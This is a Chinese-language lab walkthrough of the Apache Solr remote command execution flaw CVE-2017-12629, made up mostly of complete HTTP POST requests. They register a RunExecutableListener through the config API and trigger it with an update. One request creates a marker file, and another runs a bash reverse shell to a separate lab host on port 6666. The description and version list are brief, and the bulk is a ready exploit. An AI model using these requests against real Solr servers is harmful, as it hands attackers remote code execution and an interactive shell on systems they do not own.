Apache Solr 远程命令执行漏洞（CVE-2017-12629）

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。

攻击者可以通过发送HTTP POST请求到Solr的配置API，添加一个新的事件监听器，这个监听器可以配置为在Solr的某些事件发生时执行特定的命令。当Solr的特定事件发生时（如提交更改），Solr就会执行这些命令。这是一个无回显的RCE漏洞。

影响版本：Apache Solr < 7.1 Apache Lucene < 7.1

url：http://192.168.200.142:8983/solr/demo/config
http://192.168.200.142:8983/solr/demo/update

RCEpoc

创建listener

数据包

POST /solr/demo/config HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/ccc9wy"]}}

进行update操作，触发添加的listener

POST /solr/demo/update HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157[{"id":"test"}]

进入docker容器，查看，ccc9wy文件创建成功

反弹shell

设置监听器

POST /solr/demo/config HTTP/1.1
Host: 192.168.200.142:8983
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=E55329857A4C0EB39ED2A6B369EDDCBE
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 157{"add-listener":{"event":"postCommit","name":"newlistener1","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.200.131/6666 0>&1"]}}

执行update操作，触发listener

成功获取反弹shell